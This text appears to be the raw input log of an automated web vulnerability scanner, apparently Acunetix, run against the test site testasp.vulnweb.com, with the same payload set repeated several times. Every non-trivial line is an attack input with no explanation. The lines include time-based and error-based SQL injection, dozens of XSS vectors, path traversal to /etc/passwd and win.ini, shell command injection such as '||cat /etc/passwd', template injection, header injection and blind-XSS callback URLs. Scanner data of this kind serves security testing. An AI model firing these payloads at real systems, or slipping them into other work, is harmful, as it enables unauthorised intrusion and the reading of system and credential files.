http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<script>prompt(937573)</script>

1

1

1

testasp.vulnweb.com

-1

"|"ld

WEB-INF/web.xml

1

1

1

)

1<ScRiPt >prompt(944540)</ScRiPt>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

WEB-INF\web.xml

1

-1)

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929594></ScRiPt>

!(()&&!|*|*|

-1))

1

1

1

1

dS9hWYNg'

1<ScRiPt >prompt(928529)</ScRiPt>

1

^(#$!@#$)(()))******

'

/etc/passwd

1

1

1

1

1<video><source onerror="javascript:prompt(969329)">

rawkDgzF')

1

"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(958903)"></g></svg>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

pDzNWeac'))

1

'

1

'"()

||cat /etc/passwd

1<div style=width:expression(prompt(900545))>

1

-1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<iframe src='data:text/html

1

1

&dir

-1)

1<body onload=prompt(913251)>

1

${@print(md5(acunetix_wvs_security_test))}

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950503)>

-1))

http://hitreje8YHqTS.bxss.me/

1

'&dir&'

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(918445)>

V1TknLvS'

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

1'"

1<img/src=">" onerror=alert(937564)>

file:///etc/passwd

0cA9NKHM')

http://www.acunetix.tst

1

comments

|dir

1

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(56),CHAR(68),CHAR(97),CHAR(113),CHAR(83),CHAR(77),CHAR(88),CHAR(55)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

/\../\../\../\../\../\../\../etc/passwd

1

1<ScRiPt%20>prompt(976711)</sCripT>

1

'|dir

'"

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(56),CHAR(68),CHAR(97),CHAR(113),CHAR(83),CHAR(77),CHAR(88),CHAR(55)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

comments/.

1&lt

ChhCGcJQ'))

WEB-INF/web.xml

1

1

1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(56)+CHAR(68)+CHAR(97)+CHAR(113)+CHAR(83)+CHAR(77)+CHAR(88)+CHAR(55)) FROM syscolumns)

1

"|dir

<!--

\xf6<img acu onmouseover=prompt(986107) //\xf6>

1

WEB-INF\web.xml

1

1

1

1<input autofocus onfocus=prompt(931089)>

1'"()&%<ScRiPt >prompt(900032)</ScRiPt>

1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(56)+CHAR(68)+CHAR(97)+CHAR(113)+CHAR(83)+CHAR(77)+CHAR(88)+CHAR(55))

../../../../../../../../../../windows/win.ini

response.write(9724468*9962529)

1

1

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(67),CHAR(65),CHAR(117),CHAR(120),CHAR(82),CHAR(84),CHAR(115),CHAR(103)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

<a href='http://www.acunetix.com'>website security</a>

1

'"()&%<ScRiPt >prompt(905868)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

'+response.write(9724468*9962529)+'

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(67),CHAR(65),CHAR(117),CHAR(120),CHAR(82),CHAR(84),CHAR(115),CHAR(103)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

[url=http://www.acunetix.com]website security[/url]

1_934932

1

1

1

1

1_Cz0BS <ScRiPt >prompt(928394)</ScRiPt>

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(67)+CHAR(65)+CHAR(117)+CHAR(120)+CHAR(82)+CHAR(84)+CHAR(115)+CHAR(103)) FROM syscolumns)+'

../../../../../../../../../../windows/win.ini.jpg

"+response.write(9724468*9962529)+"

1

&cat /etc/passwd&

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(67)+CHAR(65)+CHAR(117)+CHAR(120)+CHAR(82)+CHAR(84)+CHAR(115)+CHAR(103))+'

1

1

'&cat /etc/passwd&'

1

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(87),CHAR(54),CHAR(121),CHAR(89),CHAR(78),CHAR(119),CHAR(69),CHAR(71)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

................windowswin.ini

1

1

1

"&cat /etc/passwd&"

1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(87),CHAR(54),CHAR(121),CHAR(89),CHAR(78),CHAR(119),CHAR(69),CHAR(71)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(87)+CHAR(54)+CHAR(121)+CHAR(89)+CHAR(78)+CHAR(119)+CHAR(69)+CHAR(71)) FROM syscolumns)+"

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(87)+CHAR(54)+CHAR(121)+CHAR(89)+CHAR(78)+CHAR(119)+CHAR(69)+CHAR(71))+"

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

|cat /etc/passwd#

1

acu3660\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3660

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

${99371+100137}

acux5511\xc0\xbez1\xc0\xbcz2a\x90bcxuca5511

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1<ScRiPt >prompt(957720)</ScRiPt>

1

1&n941228=v953272

1

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

WEB-INF/web.xml

1<script>prompt(951626)</script>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'

WEB-INF\web.xml

1<ScRiPt >prompt(962137)</ScRiPt>

1

testasp.vulnweb.com

1

-1)

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931232></ScRiPt>

1

1

"

)

1

1

-1))

1<ScRiPt >prompt(955004)</ScRiPt>

/etc/passwd

1

!(()&&!|*|*|

1

1

1<video><source onerror="javascript:prompt(932800)">

1

||cat /etc/passwd

atwcVgYB'

1

^(#$!@#$)(()))******

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989292)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'"()

1

1

&dir

1

BsmQn6Nu')

1

1<div style=width:expression(prompt(927686))>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<iframe src='data:text/html

1

'&dir&'

VekuuI6V'))

1

1

1

1

1<body onload=prompt(999624)>

-1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"&dir&"

'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(912509)>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

|dir

1<img src=xyz OnErRor=prompt(972959)>

"

1

http://hitcpXUWf08Jk.bxss.me/

acunetix_wvs_invalid_filename

-1))

1

1

1<img/src=">" onerror=alert(963693)>

1

comments

1

'|dir

${@print(md5(acunetix_wvs_security_test))}

file:///etc/passwd

comments

1<ScRiPt%20>prompt(977391)</sCripT>

1

ciODsbn4'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments/.

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

tsrn80mA')

1

1&lt

1

1

WEB-INF/web.xml

1

'"

1

KUbMuyA1'))

\xf6<img acu onmouseover=prompt(909284) //\xf6>

1'"()&%<ScRiPt >prompt(957701)</ScRiPt>

1

1

1

1<input autofocus onfocus=prompt(900234)>

1

WEB-INF\web.xml

<!--

1

1

'"()&%<ScRiPt >prompt(932377)</ScRiPt>

1

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../windows/win.ini

1

1

1_904017

[url=http://www.acunetix.com]website security[/url]

1

1

../../../../../../../../../../boot.ini

response.write(9214377*9719132)

1

1

1_wi0CV <ScRiPt >prompt(997925)</ScRiPt>

'+response.write(9214377*9719132)+'

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

&cat /etc/passwd&

"+response.write(9214377*9719132)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

'&cat /etc/passwd&'

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

................windowswin.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

${99022+99042}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n948868=v964111

1

acu6628\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6628

'|'ld

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

acux1238\xc0\xbez1\xc0\xbcz2a\x90bcxuca1238

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

1

"|"ld

1<ScRiPt >prompt(944638)</ScRiPt>

)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

!(()&&!|*|*|

1<script>prompt(940774)</script>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<ScRiPt >prompt(950891)</ScRiPt>

1

1

/etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

^(#$!@#$)(()))******

1

1

1

1

1

WEB-INF/web.xml

-1

'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?973817></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

WEB-INF\web.xml

"

1<ScRiPt >prompt(953987)</ScRiPt>

-1)

1

1

1

||cat /etc/passwd

1

'"()

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<video><source onerror="javascript:prompt(912454)">

1

-1))

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

MEFRFfs2'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929469)"></g></svg>

&dir

1

1

1

1

'

wIn57gw6')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<div style=width:expression(prompt(918209))>

1

1

czhT4pkC'))

"

1

1

'&dir&'

1

file:///etc/passwd

1<iframe src='data:text/html

-1

${@print(md5(acunetix_wvs_security_test))}

1

"&dir&"

1

http://hitesvCA8TaF6.bxss.me/

1

acunetix_wvs_invalid_filename

-1)

${@print(md5(acunetix_wvs_security_test))}\

/\../\../\../\../\../\../\../etc/passwd

1<body onload=prompt(988848)>

1

comments

1

1

1

|dir

-1))

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980783)>

1

comments

1

'|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

p0KdL8Hb'

1

1

1

comments/.

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(976886)>

1

1

5ykdNmfX')

1

"|dir

http://www.acunetix.tst

VwfQBvGv'))

'"

../../../../../../../../../../windows/win.ini

1<img/src=">" onerror=alert(987631)>

1

1

1

1

1

<!--

1'"()&%<ScRiPt >prompt(991975)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1<ScRiPt%20>prompt(954866)</sCripT>

response.write(9520920*9830455)

1

1

1

'"()&%<ScRiPt >prompt(936665)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1&lt

'+response.write(9520920*9830455)+'

1

1

1_924327

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"+response.write(9520920*9830455)+"

\xf6<img acu onmouseover=prompt(940904) //\xf6>

1

&cat /etc/passwd&

1

1

................windowswin.ini

1<input autofocus onfocus=prompt(943650)>

'&cat /etc/passwd&'

1

<a href='http://www.acunetix.com'>website security</a>

1

1

"&cat /etc/passwd&"

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1_KgaxK <ScRiPt >prompt(976905)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

|cat /etc/passwd#

1

1

../../../../../../../../../../etc/passwd.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'|'ld

1

1

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

"|"ld

1

WEB-INF/web.xml

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

acu4440\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4440

1

${99054+99822}

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

WEB-INF\web.xml

acux6066\xc0\xbez1\xc0\xbcz2a\x90bcxuca6066

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'

1

1&n950941=v953731

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt >prompt(934268)</ScRiPt>

1

1

1some_inexistent_file_with_long_name%00.jpg

1

"

1

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

1<script>prompt(944965)</script>

1

)

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

!(()&&!|*|*|

1

testasp.vulnweb.com

||cat /etc/passwd

1<ScRiPt >prompt(954433)</ScRiPt>

1

1

^(#$!@#$)(()))******

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

&dir

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959612></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

1

1

'&dir&'

1

1<ScRiPt >prompt(937170)</ScRiPt>

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

1

"&dir&"

1<video><source onerror="javascript:prompt(976952)">

1

1

1

1

-1))

1

1

|dir

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928674)"></g></svg>

'"()

file:///etc/passwd

1G7LnzwQ'

1

1

1

1

1

'|dir

1<div style=width:expression(prompt(966287))>

1

1

/\../\../\../\../\../\../\../etc/passwd

Eev7AZub')

'

1

1

1

1<iframe src='data:text/html

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|dir

http://hitlfFxgRzlF8.bxss.me/

1

prHq56Tp'))

"

WEB-INF/web.xml

1

1

acunetix_wvs_invalid_filename

1<body onload=prompt(910871)>

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(902207)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

-1)

1

comments

1

1

1<img src=xyz OnErRor=prompt(925366)>

-1))

../../../../../../../../../../windows/win.ini

1

1

http://www.acunetix.tst

1

'"

comments/.

1

uvPx9NTK'

../../../../../../../../../../boot.ini

1

1

87n7nYUi')

1<img/src=">" onerror=alert(961836)>

1

<!--

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

Bnhg8MnR'))

1

1

1<ScRiPt%20>prompt(991762)</sCripT>

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1&lt

response.write(9407214*9452109)

1

1'"()&%<ScRiPt >prompt(997083)</ScRiPt>

1

1

1

................windowswin.ini

1

'+response.write(9407214*9452109)+'

1

1

'"()&%<ScRiPt >prompt(993862)</ScRiPt>

\xf6<img acu onmouseover=prompt(983161) //\xf6>

..\..\..\..\..\..\..\..\windows\win.ini

1

"+response.write(9407214*9452109)+"

1

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1_944786

1<input autofocus onfocus=prompt(981678)>

1

1

1

&cat /etc/passwd&

1

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

'&cat /etc/passwd&'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1_yCXA7 <ScRiPt >prompt(939921)</ScRiPt>

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF\web.xml

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

|cat /etc/passwd#

1

1

1

acu10426\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10426

../../../../../../../../../../etc/passwd.jpg

1

acux3301\xc0\xbez1\xc0\xbcz2a\x90bcxuca3301

${100458+99099}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

'|'ld

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt >prompt(919293)</ScRiPt>

-1

1

"|"ld

1

1

1

1some_inexistent_file_with_long_name%00.jpg

-1)

1<script>prompt(947534)</script>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n943610=v993306

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

1<ScRiPt >prompt(917995)</ScRiPt>

1

'

1

testasp.vulnweb.com

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968506></ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

yxr2ZEZn'

1

)

1

"

1<ScRiPt >prompt(968231)</ScRiPt>

!(()&&!|*|*|

LdIxNbW7')

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

||cat /etc/passwd

1<video><source onerror="javascript:prompt(944255)">

1

1

^(#$!@#$)(()))******

1

1

P0TjDDRx'))

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

&dir

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981533)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

-1

1

1

1

acunetix_wvs_invalid_filename

1

1<div style=width:expression(prompt(913531))>

'&dir&'

${@print(md5(acunetix_wvs_security_test))}

1

http://hittRi4waB2Gx.bxss.me/

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

"&dir&"

1

${@print(md5(acunetix_wvs_security_test))}\

1<iframe src='data:text/html

comments

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments/.

|dir

1

1<body onload=prompt(985973)>

1

http://www.acunetix.tst

VWJaE74h'

1

'"

1

1'"()&%<ScRiPt >prompt(908087)</ScRiPt>

'|dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970106)>

1

file:///etc/passwd

9OUn4JsU')

1

<!--

'"()&%<ScRiPt >prompt(936728)</ScRiPt>

1

KxSGsVCj'))

"|dir

1

1<img src=xyz OnErRor=prompt(926699)>

1

1

1_913524

1

/\../\../\../\../\../\../\../etc/passwd

1

1<img/src=">" onerror=alert(988399)>

1

1

1

1<ScRiPt%20>prompt(900108)</sCripT>

1

1

1

response.write(9111670*9314429)

1

WEB-INF/web.xml

1

1

1

1&lt

1

&cat /etc/passwd&

'+response.write(9111670*9314429)+'

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

"+response.write(9111670*9314429)+"

1

SomeCustomInjectedHeader:injected_by_wvs

\xf6<img acu onmouseover=prompt(907061) //\xf6>

1

../../../../../../../../../../windows/win.ini

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../boot.ini

1<input autofocus onfocus=prompt(988559)>

1

"&cat /etc/passwd&"

1

1

../../../../../../../../../../windows/win.ini.jpg

1

<a href='http://www.acunetix.com'>website security</a>

1

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1_sIrbZ <ScRiPt >prompt(997185)</ScRiPt>

`cat /etc/passwd`

acu5321\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5321

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

|cat /etc/passwd#

acux9008\xc0\xbez1\xc0\xbcz2a\x90bcxuca9008

../../../../../../../../../../etc/passwd.jpg

1

1

${100275+99528}

1

'|'ld

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(955117)</ScRiPt>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<script>prompt(965473)</script>

"|"ld

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n915025=v951988

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<ScRiPt >prompt(973394)</ScRiPt>

1

1

1some_inexistent_file_with_long_name%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915626></ScRiPt>

1

-1

)

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt >prompt(948550)</ScRiPt>

-1)

1

1

testasp.vulnweb.com

WEB-INF/web.xml

^(#$!@#$)(()))******

1<video><source onerror="javascript:prompt(974290)">

-1))

1

||cat /etc/passwd

/etc/passwd

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989368)"></g></svg>

1

WEB-INF\web.xml

cHEOeRrV'

1<div style=width:expression(prompt(952452))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

&dir

3fGiVCnd')

1

1

1<iframe src='data:text/html

1

1

'&dir&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

YGpAD95r'))

1

1

1

1<body onload=prompt(925607)>

1

